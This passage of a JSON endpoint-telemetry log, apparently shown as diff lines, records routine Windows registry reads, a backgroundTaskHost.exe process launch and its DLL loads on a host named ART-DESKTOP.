"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": 
"sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 2612, - "process_name": "sihost.exe", - "process_path": "c:\\windows\\system32\\sihost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\BackgroundAccessApplications", - "registry_value": "BackgroundAccessApplications", - "timestamp": 131883571688710000, - "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\VolatileNotifications", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\VolatileNotifications\\41C64E6DA30CB855", - "registry_value": "41C64E6DA30CB855", - "timestamp": 
131883571688860000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca", - "event_type": "process", - "logon_id": 217097, - "parent_process_name": "svchost.exe", - "parent_process_path": "C:\\Windows\\System32\\svchost.exe", - "pid": 6376, - "ppid": 780, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "subtype": "create", - "timestamp": 131883571688960000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}", - "unique_ppid": "{42FC7E13-B293-5C05-0000-0010FAC80000}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571688860000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571688860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571688860000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - 
"image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571688860000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689020000, 
- "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "backgroundTaskHost.exe", - "image_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571688860000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - 
"image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "twinapi.appcore.dll", - "image_path": "C:\\Windows\\System32\\twinapi.appcore.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "rmclient.dll", - "image_path": "C:\\Windows\\System32\\rmclient.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689020000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571689180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689180000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 
2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689330000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 
2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571689330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
